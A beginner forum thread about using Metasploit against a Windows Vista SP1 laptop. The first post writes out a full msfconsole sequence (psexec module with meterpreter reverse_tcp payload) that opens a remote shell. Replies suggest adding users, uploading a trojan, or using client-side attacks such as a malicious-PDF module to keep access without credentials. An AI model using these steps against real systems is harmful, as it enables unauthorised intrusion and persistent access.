Page 1 of 2 12 LastLast
Results 1 to 10 of 12

Thread: metasploit and vista sp1

  1. #1
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default metasploit and vista sp1

    Hi Im quite new with metasploit.

    Iv been trying to hack in to my vista sp1 laptop. I did it like this and ti worked.
    Code:
    cd /pentest/exploits/framework3
    msfconsole
    use windows/smb/psexec
    set RHOST 192.168.1.38 (target)
    set SMBUser username
    set SMBPass pass
    show options
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.33 (me)
    exploit
    So the question is how can I maintain access to my laptop using metasploit so that I dont need to know username and pass.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: metasploit and vista sp1

    Once you have a shell you can add a user or you can try one of the add user payloads. Then connect back to the victim with psexec or something like that.

  3. #3
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: metasploit and vista sp1

    I mean situation when I dont know user name or password target.

  4. #4
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: metasploit and vista sp1

    Simply use an exploit to get a meterpreter session on the remote PC than just add username/pass or upload a trojan

  5. #5
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: metasploit and vista sp1

    is there any good tutorial for that, which exploit/payload to use? Iv used windows/metepreter/reverse_tcp

    but which exploit psexec needs username and pass

  6. #6
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: metasploit and vista sp1

    psexec is not a exploit. Its a windows commend line tool that allows you to connect to windows box's in a legit way once you have gained a user name and password or added one via another exploit. If you do not know the user name and password you will need to find a exploit which works with out them. Generally a client side attack is the best approach for new operating systems.

  7. #7
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: metasploit and vista sp1

    Iv tried many of exploits, but I havent found any of these working with vista sp1.

    Iv been following many guides like this http://www.securitytube.net/Client-S...oit-video.aspx

    Ideas which exploit to use?

  8. #8
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default Re: metasploit and vista sp1

    As I said in my previous post there are many client side attacks which work fine against vista.

  9. #9
    Member
    Join Date
    Jan 2010
    Location
    Helsinki, Finland
    Posts
    235

    Default Re: metasploit and vista sp1

    You mean like this windows/fileformat/adobe_pdf_embedded_exe

    please show me a example

  10. #10
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: metasploit and vista sp1

    google : How hack a remote system using Metasploit

    and search you tube plenty of videos on the topic.

Page 1 of 2 12 LastLast

Similar Threads

  1. metasploit question
    By Rob5454 in forum Beginners Forum
    Replies: 2
    Last Post: 02-28-2010, 06:34 AM
  2. Metasploit Reverse TCP
    By blarch3030 in forum Beginners Forum
    Replies: 3
    Last Post: 02-25-2010, 10:20 AM
  3. Replies: 1
    Last Post: 02-22-2010, 10:35 AM
  4. Pentest Vista WLAN with airbase-ng
    By pho_bos in forum Beginners Forum
    Replies: 2
    Last Post: 02-20-2010, 12:20 AM
  5. installed bt4final now windows vista isnt genuine?
    By alexduecker in forum BackTrack Bugs
    Replies: 2
    Last Post: 01-16-2010, 08:46 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •